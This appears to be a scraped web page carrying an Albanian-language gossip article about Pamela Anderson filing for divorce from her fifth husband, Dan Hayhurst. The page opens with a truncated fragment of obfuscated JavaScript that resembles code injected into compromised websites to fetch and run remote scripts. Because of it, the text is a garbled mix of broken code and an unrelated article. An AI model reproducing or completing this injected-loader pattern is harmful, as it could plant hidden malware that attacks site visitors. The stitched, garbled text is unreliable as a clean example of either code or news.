;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Interesante! Dështon martesa e pestë e aktores së njohur

By

Pamela Anderson ka paraqitur kërkesë për divorc nga bashkëshorti i saj i pestë, Dan Hayhurst dhe burimet thonë se kjo ndodhi për shkak se ai ishte “ishte i pasjellshëm, jombështetës” dhe “dreq”.

Aktorja po bën kërkesë për divorc në vendlindjen e saj, Kanada, ku ajo dhe bashkëshorti i saj tashmë i larguar kanë jetuar që kur u martuan në prag të Krishtëlindjeve në vitin 2020, në shtëpinë e saj në ishullin Vankuver.

Ai ishte më parë truproja e 54-vjeçares Anderson dhe kontraktor në shtëpinë e saj përpara se romanca e tyre të lulëzonte.

Një burim i afërt me çiftin tha se ndërsa gjërat fillimisht ishin të lumtura fillimisht pandemia, të qenit në karantinë së bashku në fund roamnca e tyre mori një kthesë jo të mirë.

Burimi tha, “Dan doli të ishte një karagjoz për Pamelën – ai ishte i pasjellshëm dhe jombështetës. Pasi keni kaluar dy vjet duke jetuar çdo sekondë me dikë, do ta njihni më mirë – dhe për keq.

“Ata u njohën më mirë me njëri-tjetrin dhe duke e bërë këtë, Pamela kuptoi se Dan në fakt nuk ishte ai”.

Burimi shtoi: “Gjërat nuk janë aspak miqësore mes tyre për momentin, sepse ajo vendosi që ata nuk kishin asgjë të përbashkët, ai nuk e trajtoi atë në mënyrën se si ajo mendonte se donte të trajtohej”.

“Ata ishin grindur, edhe pse ai tha se donte ta bënte martesën të funksiononte”.

Rolling Stone raportoi për herë të parë se Anderson dhe Hayhurst po divorcoheshin pas një viti martesë.

Kjo është martesa e pestë e dështuar e aktores.

Artikuj të ngjashëm